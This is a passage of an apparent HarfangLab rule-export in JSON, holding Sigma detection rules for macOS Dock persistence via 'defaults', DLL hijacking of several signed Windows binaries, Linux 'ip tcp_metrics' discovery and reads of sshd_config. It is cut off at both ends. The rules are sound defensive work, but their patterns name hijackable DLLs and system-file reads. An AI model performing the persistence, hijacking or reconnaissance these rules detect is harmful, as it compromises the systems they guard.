"content": "title: Application Added to Dock via defaults\nid: bd60d353-8f30-4566-9840-622d4dbb9b5f\ndescription: |\n Detects when a program is added to the macOS's Dock using defaults.\n Defaults allows users to read, write, and delete macOS user default values.\n The com.apple.dock.plist file defines the content of the macOS Dock.\n Adversaries may add their malicious program to the com.apple.dock.plist file to make their program show in the computer's Dock and achieve persistence.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group\n - https://attack.mitre.org/techniques/T1647/\ndate: 2024/07/08\nmodified: 2025/09/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.SystemModification\n - classification.macOS.LOLBin.Defaults\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/defaults'\n CommandLine|contains|all:\n - 'com.apple.dock'\n - ' write '\n - 'persistent-apps'\n ProcessParentImage|contains: '/'\n\n exclusion_superhuman:\n GrandparentImage: '/Applications/Superhuman.app/Contents/MacOS/Superhuman'\n\n exclusion_roblox:\n ParentCommandLine:\n - '/Volumes/RobloxStudioInstaller/RobloxStudioInstaller.app/Contents/MacOS/RobloxStudioInstaller'\n - '/Volumes/RobloxPlayerInstaller/RobloxPlayerInstaller.app/Contents/MacOS/RobloxPlayerInstaller'\n\n exclusion_intunes:\n Ancestors|contains: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_legitimate_apps:\n ProcessCommandLine|contains:\n - '/applications/company portal.app'\n - '/applications/firefox.app'\n - '/applications/microsoft excel.app'\n - '/applications/microsoft outlook.app'\n - '/applications/microsoft 
powerpoint.app'\n - '/applications/microsoft teams.app'\n - '/applications/microsoft word.app'\n - '/applications/serato dj pro.app'\n - '/system/applications/app store.app'\n - '/system/applications/launchpad.app'\n - '/system/applications/system settings.app'\n - '/system/applications/utilities/terminal.app'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd60d353-8f30-4566-9840-622d4dbb9b5f",
"rule_name": "Application Added to Dock via defaults",
"rule_description": "Detects when a program is added to the macOS's Dock using defaults.\nDefaults allows users to read, write, and delete macOS user default values.\nThe com.apple.dock.plist file defines the content of the macOS Dock.\nAdversaries may add their malicious program to the com.apple.dock.plist file to make their program show in the computer's Dock and achieve persistence.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2024-07-08",
"rule_modified_date": "2025-09-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd717793-fde9-4539-90cd-c62f18ae2c99",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601925Z",
"creation_date": "2026-03-23T11:45:34.601929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601936Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qwinsta.yml",
"content": "title: DLL Hijacking via qwinsta.exe\nid: bd717793-fde9-4539-90cd-c62f18ae2c99\ndescription: |\n Detects potential Windows DLL Hijacking via qwinsta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qwinsta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd717793-fde9-4539-90cd-c62f18ae2c99",
"rule_name": "DLL Hijacking via qwinsta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qwinsta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule fires only when the executable runs from outside System32, SysWOW64 and WinSxS and loads one of the listed DLLs from outside those directories without a 'Microsoft Windows' signature.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd86d1f6-2ffc-4fe8-96a5-88918b5860a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588006Z",
"creation_date": "2026-03-23T11:45:34.588010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_apphostregistrationverifier.yml",
"content": "title: DLL Hijacking via AppHostNameRegistrationVerifier.exe\nid: bd86d1f6-2ffc-4fe8-96a5-88918b5860a2\ndescription: |\n Detects potential Windows DLL Hijacking via AppHostNameRegistrationVerifier.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppHostNameRegistrationVerifier.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\npmproxy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: 
strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd86d1f6-2ffc-4fe8-96a5-88918b5860a2",
"rule_name": "DLL Hijacking via AppHostNameRegistrationVerifier.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppHostNameRegistrationVerifier.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd8f4750-23de-4a90-802a-c2acf1dd3ba0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294839Z",
"creation_date": "2026-03-23T11:45:35.294841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294846Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-tcp_metrics.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_tcp_metrics.yml",
"content": "title: IP TCP Metrics Execution\nid: bd8f4750-23de-4a90-802a-c2acf1dd3ba0\ndescription: |\n Detects the execution of the ip tcp_metrics subcommand, which displays the cached TCP metrics entries for recently used IPv4 and IPv6 source and destination addresses.\n Attackers may use it during the discovery phase to enumerate remote systems the host has communicated with.\n The selection matches the substring ' tc' on the ip command line (to cover tcp_metrics and its abbreviated forms) and excludes only delete/flush operations, so verify the full command line when triaging.\n It is recommended to analyze the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-tcp_metrics.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Ip\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' tc' # tcp_metrics\n ParentImage|contains: '?'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' delete'\n - ' flush'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd8f4750-23de-4a90-802a-c2acf1dd3ba0",
"rule_name": "IP TCP Metrics Execution",
"rule_description": "Detects the execution of the ip tcp_metrics subcommand, which displays the cached TCP metrics entries for recently used IPv4 and IPv6 source and destination addresses.\nAttackers may use it during the discovery phase to enumerate remote systems the host has communicated with.\nThe selection matches the substring ' tc' on the ip command line (to cover tcp_metrics and its abbreviated forms) and excludes only delete/flush operations, so verify the full command line when triaging.\nIt is recommended to analyze the parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bdabb0f7-6a9d-4c37-b933-69d36ad31f65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594988Z",
"creation_date": "2026-03-23T11:45:34.594992Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595000Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bioiso.yml",
"content": "title: DLL Hijacking via bioiso.exe\nid: bdabb0f7-6a9d-4c37-b933-69d36ad31f65\ndescription: |\n Detects potential Windows DLL Hijacking via bioiso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n The rule fires only when the executable runs from outside System32, SysWOW64 and WinSxS and loads one of the listed DLLs from outside those directories without a 'Microsoft Windows' signature.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bioiso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bdabb0f7-6a9d-4c37-b933-69d36ad31f65",
"rule_name": "DLL Hijacking via bioiso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bioiso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule fires only when the executable runs from outside System32, SysWOW64 and WinSxS and loads one of the listed DLLs from outside those directories without a 'Microsoft Windows' signature.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be097f82-bcfe-4468-a438-3578b59b4187",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593085Z",
"creation_date": "2026-03-23T11:45:34.593088Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593096Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pinenrollmentbroker.yml",
"content": "title: DLL Hijacking via pinenrollmentbroker.exe\nid: be097f82-bcfe-4468-a438-3578b59b4187\ndescription: |\n Detects potential Windows DLL Hijacking via pinenrollmentbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n The rule fires only when the executable runs from outside System32, SysWOW64 and WinSxS and loads one of the listed DLLs from outside those directories without a 'Microsoft Windows' signature.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pinenrollmentbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\PROPSYS.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be097f82-bcfe-4468-a438-3578b59b4187",
"rule_name": "DLL Hijacking via pinenrollmentbroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pinenrollmentbroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule fires only when the executable runs from outside System32, SysWOW64 and WinSxS and loads one of the listed DLLs from outside those directories without a 'Microsoft Windows' signature.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be199090-c1ac-4cbd-8c95-56a4e745b516",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.734331Z",
"creation_date": "2026-03-23T11:45:35.297413Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297418Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_server_config_read_linux.yml",
"content": "title: SSH Server Configuration Read\nid: be199090-c1ac-4cbd-8c95-56a4e745b516\ndescription: |\n Detects an attempt to read the content of the SSH server configuration file.\n The SSH server configuration contains the security settings used by SSH.\n An attacker can read the SSH server configuration to find weaknesses in them.\n It is recommended to investigate the process reading the configuration file.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/md5sum'\n - '*/sha1sum'\n - '*/sha256sum'\n - '*/lsattr'\n - '*/file'\n - '*/sum'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/rsync'\n - '/usr/bin/cp'\n - '/usr/bin/systemd-tmpfiles'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/sed'\n - '/usr/bin/rpm'\n - '/usr/bin/git'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/ssh-keygen'\n - '/sbin/ureadahead'\n - '/usr/sbin/ureadahead'\n - '/usr/bin/diff'\n - '/kaniko/executor'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_textfilecontent54'\n - '/bin/grep'\n - '/usr/bin/grep'\n\n exclusion_image:\n ProcessImage:\n - '/opt/chef/embedded/bin/ruby'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/usr/local/manageengine/uems_agent/bin/dctaskengine'\n - '/var/cfengine/bin/cf-agent'\n - 
'/opt/hpud/*/.discagnt/udscan'\n - '/opt/FortiEDRCollector/bin/FortiEDRCollector'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_sshd:\n - ProcessImage|endswith:\n - '/sshd'\n - '/sshd-socket-generator'\n - ProcessParentImage|endswith: '/sshd'\n\n exclusion_dpkg:\n - ProcessImage|endswith: '/dpkg'\n - ProcessParentImage|endswith: '/dpkg'\n - ProcessGrandparentImage|endswith: '/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage|endswith: '/apt'\n - ProcessParentImage|endswith: '/apt'\n - ProcessGrandparentImage|endswith: '/apt'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n - ProcessParentCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n - ProcessGrandparentCommandLine|contains: '/var/cache/debconf/tmp.ci/openssh-server.config.* configure'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n 
- '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf upgrade --refresh'\n\n exclusion_systemd_tempfiles:\n ProcessImage: '/usr/bin/systemd-tmpfiles'\n ProcessCommandLine: 'systemd-tmpfiles 